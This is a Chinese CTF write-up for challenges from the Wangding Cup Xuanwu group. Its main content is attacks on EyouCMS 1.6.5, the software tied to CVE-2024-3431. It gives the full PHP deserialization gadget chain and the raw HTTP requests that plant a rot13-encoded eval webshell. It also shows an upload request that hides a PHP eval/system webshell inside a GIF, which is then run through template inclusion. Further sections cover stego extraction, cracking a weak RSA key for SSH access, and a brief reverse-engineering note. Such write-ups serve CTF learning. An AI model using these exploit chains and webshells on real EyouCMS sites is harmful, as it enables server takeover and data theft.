网鼎杯玄武组_部分WP

admin 2024年11月8日15:54:19评论8 views字数 8284阅读27分36秒阅读模式

web01

方式1:反序列化

参考:

google:https://n1k0la-t.github.io/2023/01/28/EyouCMS%20v1.6.1%200day%E6%8C%96%E6%8E%98/

FreeBUF:https://www.freebuf.com/vuls/405365.html

打开网页发现是 eyoucms,1.6.5 版本 ,git搜索源码
访问后台 login.php
admin/admin 登录

网鼎杯玄武组_部分WP

网络搜索 eyoucms 漏洞,发现 cve 编号CVE-2024-3431,没有 poc

网鼎杯玄武组_部分WP

根据这篇文章构造请求

反序列化链:

<?phpnamespace thinkcachedriver;class File{    public $tag='t';    public $options = [        'path'          => 'php://filter/string.rot13/resource=<?cuc @riny($_TRG[_]);?>/../a.php'    ];}namespace thinksessiondriver;use thinkcachedriverFile;class Memcached{    public $handler;    function __construct(){        $this->handler=new File();    }}namespace thinkconsole;use thinksessiondriverMemcached;class Output{    public $styles = ['removeWhereField'];    function __construct(){        $this->handle=new Memcached();    }}namespace thinkmodelrelation;use thinkconsoleOutput;class HasOne{    function __construct(){        $this->query=new Output();    }}namespace thinkmodel;use thinkmodelrelationHasOne;class Pivot{    public $append = ['getError'];    public function __construct(){        $this->error=new HasOne();    }}namespace thinkprocesspipes;use thinkmodelPivot;class Windows{    public function __construct(){        $this->files=[new Pivot()];    }}$x=new Windows();echo strlen(serialize($x));echo base64_encode(serialize($x));

1、先增加一个栏目,默认id为541,不行的话可以爆破

POST /04cfe8025e76b4985ae4aee3b162b2d1/login.php?m=admin&c=Field&a=arctype_add&_ajax=1&lang=cn HTTP/1.1Host: 192.168.1.3Accept: application/json, text/javascript, */*; q=0.01Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Length: 94Content-Type: application/x-www-form-urlencoded; charset=UTF-8Cookie: PHPSESSID=6unq4gjml60ldlodv54t4i5m51; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A0%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=welcome%7CIndexOrigin: http://192.168.1.3Referer: http://192.168.1.3/login.php?m=admin&c=Arctype&a=ajax_newtpl&lang=cn&type=lists&nid=singleUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36X-Requested-With: XMLHttpRequesttitle=web01test&name=web01test&dtype=region&dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99

网鼎杯玄武组_部分WP

2、编辑这个栏目,写入序列化内容

POST /04cfe8025e76b4985ae4aee3b162b2d1/login.php?m=admin&c=Field&a=arctype_edit&_ajax=1&lang=cn HTTP/1.1Host: 192.168.1.3Accept: application/json, text/javascript, */*; q=0.01Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Length: 1001Content-Type: application/x-www-form-urlencoded; charset=UTF-8Cookie: PHPSESSID=6unq4gjml60ldlodv54t4i5m51; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A0%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=welcome%7CIndexOrigin: http://192.168.1.3Referer: http://192.168.1.3/login.php?m=admin&c=Arctype&a=ajax_newtpl&lang=cn&type=lists&nid=singleUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36X-Requested-With: XMLHttpRequesttitle=web01test&name=web01test&old_dtype=region&dfvalue=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A5%3A%22files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A6%3A%22append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A5%3A%22error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A1%3A%7Bs%3A5%3A%22query%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A6%3A%22styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22removeWhereField%22%3B%7Ds%3A6%3A%22handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A7%3A%22handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A3%3A%22tag%22%3Bs%3A1%3A%22t%22%3Bs%3A7%3A%22options%22%3Ba%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A68%3A%22php%3A%2F%2Ffilter%2Fstring.rot13%2Fresource%3D%3C%3Fcuc+%40riny%28%24_TRG%5B_%5D%29%3B%3F%3E%2F..%2Fa.php%22%3B%7D%7D%7D%7D%7D%7D%7D%7D&old_dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99&id=548&old_name=web01test&dtype[]=region

网鼎杯玄武组_部分WP

写入成功

网鼎杯玄武组_部分WP

3、访问触发反序列化

网鼎杯玄武组_部分WP

4、这里我本地搭建环境没复现成功,应该php版本或者think的问题,比赛环境是直接成功的。

网鼎杯玄武组_部分WP

方式2:文件上传+文件包含

1、上传

网鼎杯玄武组_部分WP

网鼎杯玄武组_部分WP

POST /login.php?m=admin&c=Ueditor&a=imageUp&savepath=allimg&pictitle=banner&dir=images&is_water=1&lang=cn&unneed_syn= HTTP/1.1Host: 192.168.10.35Content-Length: 432X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjnlAMRs0RqFuCxyMOrigin: http://192.168.10.35Referer: http://192.168.10.35/login.php?m=admin&c=Uploadimgnew&a=get_upload_list&info=eyJudW0iOjEsInNpemUiOjIwOTcxNTIsImlucHV0IjoiIiwiZnVuYyI6IndlY2hhdF9waWNfY2FsbF9iYWNrIiwicGF0aCI6ImFsbGltZyIsImlzX3dhdGVyIjoxfQ%3D%3D&lang=cn&unneed_syn=Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: espcms_web_user_info=Ka46smL5rcg9exEplxVYBVPRwmhEQA6WeYFCIvIMSsqPsuPuTTNb3W1%2FjaBzTU8ez8gp%2B8pggV96%2FZZtDyCp2uJtQy8NyMSIat%2BvE15CWXvwKG3n5VqW2skWCXQ6epGhfQsVExJeu5afV6hcPyVcTp335WzaCu4L6q3YSjw9sR8ss3Vrctetiruty%2FS2UUD9NzKAaXwbsQ7Sndg3zsSi1RfTrIS7Txat%2B6jfxE%2FR36YAGMyepHPgXUX3CjAw4h7mBNtve5A2ZgpXZvG%2BJIBZVsfK2%2FQeVbCv7NCTHnRKapvzrqpvJk%2F8GWLVJUy%2F%2F74T5zcsZ5k05IjJy%2BszM77h4TOAg6rWLOaIZphyxq8I%2B88iwSHEFYRkWXB%2B9iXLDCVuATDNEcS0iMCecO9yhvRLpQEGrZuwV5fuHlhqg3IUjSV6DdNsBmWlxFfs%2BKWUAugin%2BrJ3AegVzg3jRgqIQwuXg5LwcfuUaPtPpqYdvMfJSJkrn2qTXqE0A9H7xv47mPWqcc9QBuJdiaSVt3ijy%2FcS0Hodi7p6gQ4AIYvxVYczR%2B%2FSrTxflt5EPng0QICB8keDjUPoLZ0bBT2YXXNzafYm%2Bn7b1NT2mtsdqNbDwffTjAKprS8iU1jKiyHtkg0PtGkE2HopemShQWMUjyjjlFoUsy5THdslhBwJNEwYYuQpPc2dH1VQYVPvezGze%2FEw%2B6frJ7ieHN6k2izdIJBK5lFsdAnJySSQgDlciYU632iSBxlUhOeErpPgxdh9ON7HctN%2FHWc7bXuKLtukHXubGDz0qiyo8sZ%2Fd7kPa%2FhOwCmI4MtIpnewKEEIzLn5wyMGFdj; espcms_web_server_info=cnlbzvT9pkB%2F%2Fa3QXzislq9%2B4%2BgVEB33q9hnv74tDZXmh5ZVm50VInsr%2BTFqqZIwS9KGlhqQlhlmBozbvdy7rRXUEE72xLLajnYi0wLIYmA%3D; PHPSESSID=e7jp10jq6tvdrspdg2uhfmaugh; admin_lang=cn; home_lang=cn; admin-treeClicked-Arr=%5B%5D; admin-arctreeClicked-Arr=%5B%5D; ENV_IS_UPHTML=0; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A0%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; imgname_id_upload=erweima.png; workspaceParam=web%7CSystem; img_id_upload=Connection: keep-alive------WebKitFormBoundaryjnlAMRs0RqFuCxyMContent-Disposition: form-data; name="_ajax"1------WebKitFormBoundaryjnlAMRs0RqFuCxyMContent-Disposition: form-data; name="file"; filename="erweima.gif"Content-Type: image/pngGIF89a<?php @eval($_POST['hack']);phpinfo();system("dir");?>------WebKitFormBoundaryjnlAMRs0RqFuCxyMContent-Disposition: form-data; name="type_id"0------WebKitFormBoundaryjnlAMRs0RqFuCxyM--

网鼎杯玄武组_部分WP

2、文件包含

功能地图找到模板功能,将文件包含到index.html中

网鼎杯玄武组_部分WP

网鼎杯玄武组_部分WP

{eyou:include file="uploads/allimg/20241107/1-24110G513534M.gif" /}

网鼎杯玄武组_部分WP

网鼎杯玄武组_部分WP

web03

解题步骤(WriteUp

第一步:环境如图

网鼎杯玄武组_部分WP

第二步:御剑扫描发现robots.txt

网鼎杯玄武组_部分WP

第三步:下载 wbStego4.bmp

 使用 wbStego4 工具导出文件

网鼎杯玄武组_部分WP

网鼎杯玄武组_部分WP

网鼎杯玄武组_部分WP第四步:改为公钥格式

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAHqSISYfkwuFeX20KTtyDhpG/nmyMK5MrmjKILUbLxpEtgw+4i0sIR4sWtNpGSVAMLZ4YO8EY6p7FBw0z4u0ALo2qC8I763lfKlNXH1WHWexRHd72MEpxpOzt79ukabEr7OWpRdDEISj3MyEalVNYGTKMt/TQWR/dnFd+TsDB2aRDBQQq9VfQhZ9Z864huQ4Du8PKg42plzfRPJsEhe4JpE0GW5QRap9ZNHM/4fSSHJlwqbBqGdeIjw+U7zY/RokxK979+f7SN6qMc9FzAUTnbwFGLpZe4ohz4pPJNrmRKfERTSKDoXw1krdDZuEZzCgiprpR8WqLvGoDXhYstcrgWU=

第五步:西二风ctf工具破解公钥

网鼎杯玄武组_部分WP第六步:导出私钥链接SSH

网鼎杯玄武组_部分WP

网鼎杯玄武组_部分WP

本地搭建SSH公钥登录环境

FROM ubuntu:20.04# 安装SSH服务器RUN apt-get update &&     apt-get install -y openssh-server &&     mkdir /var/run/sshd &&     mkdir /root/.ssh# 设置root密码(可选)RUN echo 'root456:*111!!' | chpasswd# 允许root用户SSH登录RUN sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config# 添加公钥RUN echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAHqSISYfkwuFeX20KTtyDhpG/nmyMK5MrmjKILUbLxpEtgw+4i0sIR4sWtNpGSVAMLZ4YO8EY6p7FBw0z4u0ALo2qC8I763lfKlNXH1WHWexRHd72MEpxpOzt79ukabEr7OWpRdDEISj3MyEalVNYGTKMt/TQWR/dnFd+TsDB2aRDBQQq9VfQhZ9Z864huQ4Du8PKg42plzfRPJsEhe4JpE0GW5QRap9ZNHM/4fSSHJlwqbBqGdeIjw+U7zY/RokxK979+f7SN6qMc9FzAUTnbwFGLpZe4ohz4pPJNrmRKfERTSKDoXw1krdDZuEZzCgiprpR8WqLvGoDXhYstcrgWU=" > /root/.ssh/authorized_keys# 设置正确的权限RUN chmod 700 /root/.ssh &&     chmod 600 /root/.ssh/authorized_keys# 暴露SSH端口EXPOSE 22# 启动SSH服务CMD ["/usr/sbin/sshd", "-D"]
docker build -t ssh-server .
docker run -d -p 2222:22 --name ssh-container ssh-server

Reverse2

解题步骤(WriteUp)

1、反编译直接读取class文件,在里面搜wdflag

2、抓内存

网鼎杯玄武组_部分WP

原文始发于微信公众号(瓜神学习网络安全):网鼎杯玄武组_部分WP

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月8日15:54:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   网鼎杯玄武组_部分WPhttp://cn-sec.com/archives/3369211.html

发表评论

匿名网友 填写信息